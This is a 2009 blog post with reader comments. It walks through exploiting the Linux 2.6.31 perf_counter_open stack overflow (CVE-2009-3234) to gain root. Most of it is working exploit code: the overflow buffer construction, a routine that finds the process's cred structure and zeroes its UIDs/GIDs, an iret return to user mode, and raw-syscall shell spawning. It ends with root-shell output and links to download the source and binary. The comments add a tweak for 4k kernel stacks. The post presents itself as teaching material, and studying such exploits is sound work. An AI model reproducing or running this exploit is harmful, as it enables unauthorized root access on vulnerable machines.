Linux kernel 2.6.31 perf_counter_open exploit
Well, it has been a while since my last technical post … More than a year?!? Wow, time flies.
So let’s go for a post about Linux kernel exploitation (yeah, I know, sounds cool). We will exploit a quite recent bug in kernel 2.6.31 (still unpatched at the time of writing) in the perf_counter_open syscall (CVE-2009-3234) to gain root privileges. As real hackers say, f34R.
But let’s start at the beginning: the bug.
perf_copy_attr and the dual fail
The perf_copy_attr function is meant to copy a data structure (of type perf_counter_attr) from user space to kernel space. Its definition is:
```c
static int perf_copy_attr(struct perf_counter_attr __user *uattr,
                          struct perf_counter_attr *attr)
```
With uattr being a pointer to the (source) user space structure, and attr being a pointer to the (destination) kernel space structure.
Here is the perf_copy_attr code:
```c
static int perf_copy_attr(struct perf_counter_attr __user *uattr,
                          struct perf_counter_attr *attr)
{
[...]
    u32 size;
[...]
    ret = get_user(size, &uattr->size);
[...]
    /*
     * If we're handed a bigger struct than we know of,
     * ensure all the unknown bits are 0.
     */
    if (size > sizeof(*attr)) {
        unsigned long val;
        unsigned long __user *addr;
        unsigned long __user *end;

        addr = PTR_ALIGN((void __user *)uattr + sizeof(*attr),
                         sizeof(unsigned long));
        end  = PTR_ALIGN((void __user *)uattr + size,
                         sizeof(unsigned long));

        for (; addr < end; addr += sizeof(unsigned long)) {
            ret = get_user(val, addr);
            if (ret)
                return ret;
            if (val)
                goto err_size;
        }
    }

    ret = copy_from_user(attr, uattr, size);
[...]
}
```
Let’s look at what is happening:
First, size is copied from the user data (line 7 of the listing):
```c
ret = get_user(size, &uattr->size);
```
Then, size bytes from the user buffer pointed to by uattr are copied to the kernel buffer pointed to by attr (line 32):
```c
ret = copy_from_user(attr, uattr, size);
```
This means that if the user supplies uattr with uattr->size greater than the size of the buffer pointed to by attr, the buffer will overflow. That’s the first fail.
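To make the first fail concrete, here is a minimal user-space sketch of a copy that never trusts the length claimed by the caller. It is only a model and not the kernel's actual fix: struct model_attr and bounded_copy are hypothetical names, and memcpy stands in for copy_from_user.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Hypothetical stand-in for the 64-byte kernel structure: only its size matters. */
struct model_attr {
    unsigned char bytes[64];
};

/*
 * Copy at most sizeof(*dst) bytes, whatever length the caller claims.
 * Returns the number of bytes actually copied.
 */
size_t bounded_copy(struct model_attr *dst, const void *src, size_t claimed_size)
{
    size_t n = claimed_size < sizeof(*dst) ? claimed_size : sizeof(*dst);

    assert(dst != NULL && src != NULL);
    memcpy(dst, src, n);
    return n;
}
```

With a claimed size of 128, only the first 64 bytes reach the destination, so whatever sits after the structure is left untouched.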
But between lines 7 and 32, there is a comment followed by a block of code. The comment (lines 9 to 12) says:
```c
/*
 * If we're handed a bigger struct than we know of,
 * ensure all the unknown bits are 0.
 */
```
Without reading the code, you would think that you can overflow the buffer only with zeros, which, while not making the exploitation impossible, makes it more difficult. But if you read the code (line 15, then lines 23 to 29), you will see this:
```c
unsigned long __user *addr;
```
```c
for (; addr < end; addr += sizeof(unsigned long)) {
    ret = get_user(val, addr);
    if (ret)
        return ret;
    if (val)
        goto err_size;
}
```
Pointer arithmetic scales by the size of the pointed-to type: adding 1 to a pointer advances it by one element, not by one byte. Since addr is an unsigned long *, addr += sizeof(unsigned long) advances it by 4 elements, that is 4*4 = 16 bytes, on a 32-bit system.
This means that the loop only checks one long out of every four for zero. That’s the second fail.
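The stride can be observed in plain user space. The sketch below reproduces the loop shape on an ordinary array and compares it with a check that visits every word; the function names are made up for this illustration and nothing here touches the kernel.

```c
#include <assert.h>
#include <stddef.h>

/* Same loop shape as the kernel code: a typed pointer bumped by a byte count. */
int tail_is_zero_flawed(const unsigned long *start, size_t nwords)
{
    const unsigned long *end = start + nwords;

    /* Keeps the stepped pointer from going past one-past-the-end. */
    assert(nwords % sizeof(unsigned long) == 0);

    for (const unsigned long *p = start; p < end; p += sizeof(unsigned long))
        if (*p)
            return 0;
    return 1;
}

/* What the comment promises: every word is inspected. */
int tail_is_zero_strict(const unsigned long *start, size_t nwords)
{
    for (size_t i = 0; i < nwords; i++)
        if (start[i])
            return 0;
    return 1;
}

/* Number of words the flawed loop actually reads. */
size_t words_checked_flawed(const unsigned long *start, size_t nwords)
{
    const unsigned long *end = start + nwords;
    size_t checked = 0;

    assert(nwords % sizeof(unsigned long) == 0);

    for (const unsigned long *p = start; p < end; p += sizeof(unsigned long))
        checked++;
    return checked;
}
```

On a 32-bit build the flawed loop reads one word in four; on a 64-bit build, where unsigned long is 8 bytes, it reads one word in eight. A tail that is zero only at those positions passes the flawed check and fails the strict one.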
Exploitation
Note:
If you are not comfortable with stack based buffer overflow, you should first read this famous article from Aleph1: Smashing The Stack For Fun And Profit
The interesting thing for us is that perf_copy_attr is called directly from the perf_counter_open syscall and that the destination buffer is on the stack, so it’s a typical stack-based buffer overflow:
```c
SYSCALL_DEFINE5(perf_counter_open,
                struct perf_counter_attr __user *, attr_uptr,
                pid_t, pid, int, cpu, int, group_fd, unsigned long, flags)
{
[...]
    struct perf_counter_attr attr;
[...]
    ret = perf_copy_attr(attr_uptr, &attr);
[...]
```
Now, let’s have a look at the perf_counter_attr structure:
```c
/*
 * Hardware event to monitor via a performance monitoring counter:
 */
struct perf_counter_attr {
    __u32 type;
    __u32 size;
[...]
    /* Total struct length: 64 bytes */
```
To trigger the overflow and modify the kernel code flow, we need to craft an attr buffer such that:
- attr.size > sizeof(struct perf_counter_attr)
- After the first 64 bytes of our buffer, zeroes are placed wherever the loop in perf_copy_attr looks, so it does not kick us out
- The return address of perf_counter_open, located on the stack, is overwritten with the address of our code
Modifying the kernel code flow
Note:
Before continuing, something you should remember is that the Linux kernel shares the address space of the process, so you can access your process’ memory from the kernel almost as easily as if you were accessing it from your program.
The following code is self-explanatory. We start by setting attr.size to 128, then the first loop fills the part of attr which will overflow with the address we want to jump to when in kernel-land, and the second loop puts 0s where needed so that we pass the loop test in perf_copy_attr. At the end, we just make a syscall to perf_counter_open.
```c
#define SIZEOF_ATTR 64
#define BUFFER_LEN 128

void start()
{
    uint32_t *attr = malloc(BUFFER_LEN);
    uint32_t *stack_overflow = (void *)attr + SIZEOF_ATTR;
    uint32_t *aligned_overflow = PTR_ALIGN(stack_overflow, sizeof(unsigned long));

    memset(attr, 0, SIZEOF_ATTR);

    /* size is the second u32 in the struct */
    attr[1] = 128;

    while (stack_overflow < attr + (BUFFER_LEN / sizeof (*attr)))
    {
        *stack_overflow = (uint32_t)kernel_code;
        stack_overflow ++;
    }

    /* then put 0s where we need them ... */
    while (aligned_overflow < attr + (BUFFER_LEN / sizeof (*attr)))
    {
        *aligned_overflow = 0;
        aligned_overflow += 4;
    }

    syscall(__NR_perf_counter_open, attr, 0, 0, 0, 0);
}
```
So, if all goes well, when the perf_counter_open function returns, the code flow should be redirected to our code and executed with kernel privileges (ring0).
The Kernel trip
What we need to do while in ring0 (kernel land) is modify the credentials of our process to get root privileges, then exit the kernel. Once back in ring3 (user land), we will start a shell from our process with root privileges.
We start by writing our kernel_code function like this:
```c
void kernel_code()
{
    update_cred();
    exit_kernel();
}
```
Upgrading credentials
Credentials of a process are stored in the task_struct. The task_struct is a huge structure holding everything about a process. The address of the current process’ task_struct is stored in the thread_info structure at the base (lowest address) of the kernel stack, so it can be recovered by masking the stack pointer.
The task_struct can be laid out in different ways depending on kernel compilation options. So, even with the address of this structure, we cannot calculate the exact position of the credential-related fields. On recent kernels, credentials are stored in a cred structure pointed to by the task_struct.
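On 32-bit x86 kernels of this era, the pointer to the current task_struct is usually reached by rounding the kernel stack pointer down to the start of the stack area, where thread_info lives. The sketch below only shows that arithmetic on plain integers; kernel_stack_base is a hypothetical helper, and the two stack sizes correspond to the 0xffffe000 and 0xfffff000 masks quoted in the comments further down.

```c
#include <assert.h>
#include <stdint.h>

/*
 * Round a stack pointer down to the start of its stack area.
 * thread_size must be a power of two (8192 for 8 KB stacks, 4096 for 4 KB stacks).
 */
uint32_t kernel_stack_base(uint32_t sp, uint32_t thread_size)
{
    assert(thread_size != 0 && (thread_size & (thread_size - 1)) == 0);
    return sp & ~(thread_size - 1);
}
```

For an example stack pointer of 0xc1235abc, the 8 KB mask gives 0xc1234000 while the 4 KB mask gives 0xc1235000, which is why code hard-wired for one stack size reads the wrong address on the other.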
Here is how the task_struct links the credentials:
```c
struct task_struct {
[...]
/* process credentials */
    const struct cred *real_cred;   /* objective and real subjective task
                                     * credentials (COW) */
    const struct cred *cred;        /* effective (overridable) subjective task
                                     * credentials (COW) */
[...]
```
And here is the cred structure:
```c
struct cred {
    atomic_t    usage;
    uid_t       uid;            /* real UID of the task */
    gid_t       gid;            /* real GID of the task */
    uid_t       suid;           /* saved UID of the task */
    gid_t       sgid;           /* saved GID of the task */
    uid_t       euid;           /* effective UID of the task */
    gid_t       egid;           /* effective GID of the task */
    uid_t       fsuid;          /* UID for VFS ops */
    gid_t       fsgid;          /* GID for VFS ops */
    unsigned    securebits;     /* SUID-less security management */
    kernel_cap_t cap_inheritable; /* caps our children can inherit */
    kernel_cap_t cap_permitted; /* caps we're permitted */
    kernel_cap_t cap_effective; /* caps we can actually use */
    kernel_cap_t cap_bset;      /* capability bounding set */
#ifdef CONFIG_KEYS
    unsigned char jit_keyring;  /* default keyring to attach requested
                                 * keys to */
    struct key  *thread_keyring; /* keyring private to this thread */
    struct key  *request_key_auth; /* assumed request_key authority */
    struct thread_group_cred *tgcred; /* thread-group shared credentials */
#endif
#ifdef CONFIG_SECURITY
    void        *security;      /* subjective LSM security */
#endif
    struct user_struct *user;   /* real user ID subscription */
    struct group_info *group_info; /* supplementary groups for euid/fsgid */
    struct rcu_head rcu;        /* RCU deletion hook */
};
```
As you may have noticed, task_struct links two cred structures. Under normal circumstances, the two pointers have the same value, thus pointing to the same cred structure.
This, plus the very particular layout of the cred structure, which has all the UIDs/GIDs side by side, gives us a recognizable signature.
We will be able to find the cred structure’s address by walking the task_struct, searching for two adjacent fields that have exactly the same value and look like pointers to objects in the kernel memory space.
Then we will check whether the pointed-to memory looks like a cred structure by looking at the sequence of UIDs/GIDs.
Once the cred structure is found, we just have to put 0s in the UIDs and GIDs to give our process root privileges.
Here is the code of our update_cred function:
```c
static void update_cred()
{
    uint32_t i;
    uint32_t *task = get_current(); /* Pointer to the task_struct */
    uint32_t *cred = 0;

    for (i = 0; i < 1024; i++)
    {
        cred = (uint32_t *)task[i];
        if (cred == (uint32_t *)task[i+1] && cred > (uint32_t *)0xc0000000) {
            cred++; /* Skip the cred's 'usage' field */
            if (cred[0] == uid && cred[1] == gid
                && cred[2] == uid && cred[3] == gid
                && cred[4] == uid && cred[5] == gid
                && cred[6] == uid && cred[7] == gid)
            {
                /* Get root */
                cred[0] = cred[2] = cred[4] = cred[6] = 0;
                cred[1] = cred[3] = cred[5] = cred[7] = 0;
                break;
            }
        }
    }
}
```
Well, we now need to go back to our process …
Exiting kernel
Exiting the kernel will not be difficult: all we have to do is prepare the stack and execute the iret instruction.
As defined in the Intel manuals, iret returns control to the interrupted program. When iret returns to a less privileged ring, the processor pops data from the stack into the EIP register, CS segment register, EFLAGS register, ESP register and finally SS segment register.
The segment registers and EFLAGS will be set to “standard” values, while ESP will point to a memory buffer defined in our program (exit_stack) and EIP will hold the address of our spawn_shell function.
Once the iret instruction has executed, we will be back in our program, at the start of the spawn_shell function, in user mode with root privileges.
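The order of the five values is easier to see as a structure. This is only an illustrative model of the 32-bit frame, with hypothetical names (struct iret_frame, make_iret_frame); the actual selector and flag values are not given in this post, so they are left as parameters.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Values popped by a 32-bit iret that returns to a less privileged ring. */
struct iret_frame {
    uint32_t eip;     /* offset 0x00: popped first */
    uint32_t cs;      /* offset 0x04 */
    uint32_t eflags;  /* offset 0x08 */
    uint32_t esp;     /* offset 0x0c */
    uint32_t ss;      /* offset 0x10: popped last */
};

/* Five 32-bit words with no padding. */
static_assert(sizeof(struct iret_frame) == 20, "unexpected padding in iret_frame");

/* Fill a frame from its five components; purely a data-layout helper. */
struct iret_frame make_iret_frame(uint32_t eip, uint32_t cs, uint32_t eflags,
                                  uint32_t esp, uint32_t ss)
{
    struct iret_frame f;

    f.eip = eip;
    f.cs = cs;
    f.eflags = eflags;
    f.esp = esp;
    f.ss = ss;
    return f;
}
```

The field offsets match the 0x00 to 0x10 displacements used relative to ESP in the exit_kernel code.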
Here is the code:
```c
static void exit_kernel()
{
    __asm__ __volatile__ (
        "movl %0, 0x10(%%esp) ;"
        "movl %1, 0x0c(%%esp) ;"
        "movl %2, 0x08(%%esp) ;"
        "movl %3, 0x04(%%esp) ;"
        "movl %4, 0x00(%%esp) ;"
        "iret"
        : : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL),
            "i" (USER_CS), "r" (spawn_shell)
    );
}
```
Last, but not least … spawning a shell !
Now we are back in user land (ring3). As we changed our stack address and smashed some segment registers (like GS), we cannot rely on the libc, so we will start our shell with raw system calls written in inline assembly. It’s quite simple: a write syscall to print a message, then an execve syscall to start the shell.
spawn_shell:
```c
static inline void spawn_shell()
{
    static char *s = "Starting shell\n";
    static char *t[] = {"/bin/sh", 0};

    my_syscall(SYS_write, 1, (unsigned int)s, mystrlen(s), 0, 0);
    my_syscall(SYS_execve, (unsigned int)*t, (unsigned int)t, 0, 0, 0);
}
```
my_syscall:
```c
unsigned int my_syscall(unsigned int nb, unsigned int arg1, unsigned int arg2,
                        unsigned int arg3, unsigned int arg4, unsigned int arg5)
{
    unsigned int ret;

    __asm__ (
        "mov %1, %%eax ;"
        "mov %2, %%ebx ;"
        "mov %3, %%ecx ;"
        "mov %4, %%edx ;"
        "mov %5, %%esi ;"
        "mov %6, %%edi ;"
        "int $0x80 ;"
        "mov %%eax, %0 ;"
        : "=r" (ret)
        : "m" (nb), "m" (arg1), "m" (arg2), "m" (arg3), "m" (arg4), "m" (arg5)
    );
    return ret;
}
```
And we are done!
You should now have a root shell.
This is the result on an Ubuntu Jaunty host with a 2.6.31 kernel (from the Ubuntu repositories):
```
xipe@tomate:~/exploit$ id
uid=1000(xipe) gid=1000(xipe) groups=4(adm),20(dialout),24(cdrom),29(audio),46(plugdev),106(lpadmin),121(admin),122(sambashare),1000(xipe)
xipe@tomate:~/exploit$ ./sys_perf_counter_open_sploit
Starting shell
# id
uid=0(root) gid=0(root) groups=4(adm),20(dialout),24(cdrom),29(audio),46(plugdev),106(lpadmin),121(admin),122(sambashare),1000(xipe)
# uname -a
Linux tomate 2.6.31-10-generic #34-Ubuntu SMP Wed Sep 16 00:23:19 UTC 2009 i686 GNU/Linux
#
```
Exploit code
The exploit code and binary can be found here:
Download source
Download binary
That’s all folks ! Have fun !
September 24th, 2009 at 17:07
Not only are you 8 days late to the game (I published an analysis of the bug and posted my exploit for x86/x64 on the 16th), you could at least credit the people whose code you ripped (namely qaaz’s vmsplice exploit).
The better exploit has been at http://grsecurity.net/~spender/enlightenment.tgz
Why reinvent the wheel?
-Brad
September 24th, 2009 at 17:33
Hi spender,
Yes, I used the exit_kernel from the vmsplice exploit coded by qaaz, I am happy you saw it … the fact is it’s 7 lines of asm that are not so difficult to write if you read the Intel manual
Also, I didn’t know that it was forbidden to write something if someone else already wrote on the subject … btw, could you give me the URL of your analysis? I would be happy to read it.
Last thing: This article is more like a “How To” than a cutting-edge exploitation technique … I chose this bug because it was an easily exploitable bug, not because I wanted to be the first writing on it. I think (and hope) my post will help people wanting to gain some base knowledge about exploiting the Linux kernel.
Best regards, and relax
- Xipe
September 24th, 2009 at 18:23
http://twitter.com/spendergrsec
Scroll down to the 16th
(it was referenced by the mail to oss-security about the kernel vulnerability)
September 24th, 2009 at 18:38
Great, I am now following you on twitter
September 24th, 2009 at 18:55
Yeah… heaven forbid someone use the documented way to return across ring boundaries. Brad, you do good research. I’ll give you that. But you sure do fucking whine and cry a lot about shit. Does your ego really not get fed enough? Jesus man..
September 24th, 2009 at 19:17
I wasn’t asking credit for myself (since he obviously hadn’t seen the work I had done), just for the person whose code they ripped (including the get_stack_top code which doesn’t work on 4k stacks). It’s common courtesy.
September 24th, 2009 at 19:33
spender, concerning the code that doesn’t work on 4k stacks … I wrote it as documented in Understanding the Linux Kernel, 3rd edition … please just stop
For people reading this and wanting to run the exploit on a 4k stack, you should change the “movl $0xffffe000,%%eax ;” with “movl $0xfffff000,%%eax ;”
Best regards,
- Xipe
September 25th, 2009 at 04:15
Xipe, thanks for the walk-through. For those not familiar with kernel exploitation, it’s a good read and educational. Spender, if you read this, your code and research are top-notch, and grsecurity is a valuable addition to our world. But your apparent arrogance and harsh criticism of others, including the elitist arrogance of calling others idiots sends a big fat pointer towards your own ego-trip. I’m sure you popped out of the womb knowing everything. Cool the ego and life will be better.
October 10th, 2009 at 07:06
Spender has always been out for glory, it’s common news that he stole the whole grsecurity ideology, I mean — a bug was discovered, and exploited over a week ago, and he scouts the internet for blogs that talk about it without giving credit to him and qaaz, funny how it’s not qaaz that complains
— Good work xipe, continue posting more, I’m sure a lot of people congratulate your efforts.
October 10th, 2009 at 07:16
Also, credits should go to Silvio Cesare for being the first to use iret in 03, so there!
October 10th, 2009 at 16:16
Thank you Keen
- Xipe
October 13th, 2009 at 22:41
excellent writeup!
October 18th, 2009 at 15:04
Nice post.
October 31st, 2009 at 01:18
Write more !